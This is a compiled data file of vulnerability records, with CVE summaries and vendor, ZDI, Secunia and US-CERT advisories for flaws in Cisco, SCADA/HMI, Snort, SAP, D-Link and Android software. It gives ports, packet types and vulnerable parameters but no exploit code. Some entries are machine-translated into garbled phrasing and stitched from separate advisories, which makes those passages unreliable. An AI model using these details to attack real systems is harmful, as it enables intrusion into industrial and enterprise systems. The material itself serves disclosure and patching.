iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-202407-0046 mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device. Authentication is not required to exploit this vulnerability.The specific flaw exists within the telnet service, which listens on TCP port 5005 by default. The issue results from the use of hard-coded credentials. mySCADA myPRO is an application software. myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202410-2013 In mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Google of Android Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Google Pixel is a smartphone produced by Google in the United States. Google Pixel has a buffer overflow vulnerability. The vulnerability is caused by incorrect boundary checking in mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c. Attackers can exploit this vulnerability to cause out-of-bounds write
var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-155 : InduSoft Thin Client ISSymbol InternationalOrder Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-155 August 22, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12505. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-08-22 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUDUFHFVtgMGTo1scAQJ1Twf8C0MRiovFv7JVpAgg+lOYT3HW7MYdUKAx /I+4hvkGyeKKCCkvIOkx0y7eSdwp4paxVZAd0WYTfsG0K1h+bBngt6m+3Nicx0Iq YuqyOluJTW4ymXUSwvX8MZ39709DQXEl5yp9JvIX+Dc4WY7TKauGYKIfbb/VRMQq VYgQPhnlv8laGORlVREpu+yrOPdYLbQSucewpaLXd4b8uw1+Kmurjepiil5vxqPD G3fD23i1jGrbg6aX0AlvECo1M12alERft7wjtI21D7VP7G3uBYwiAJ8jxutavMQY Yf5K6rzdbx+96MuFco7aYB49GBQDpMYvWeWur3YEv1GqR7bSotpO1Q== =Yxrq -----END PGP SIGNATURE-----
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201407-0233 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-202411-1458 Cross Site Scripting vulnerability in DLink DWR 2000M 5G CPE With Wifi 6 Ax1800 and Dlink DWR 5G CPE DWR-2000M_1.34ME allows a local attacker to obtain sensitive information via the file upload feature of the VPN configuration module. D-Link Systems, Inc. of dwr-2000m Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. D-Link DWR-2000M is a wireless router from D-Link, a Chinese company. D-Link DWR-2000M has a cross-site scripting vulnerability. The vulnerability is caused by the lack of effective filtering and escaping of user-provided data by the application
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures 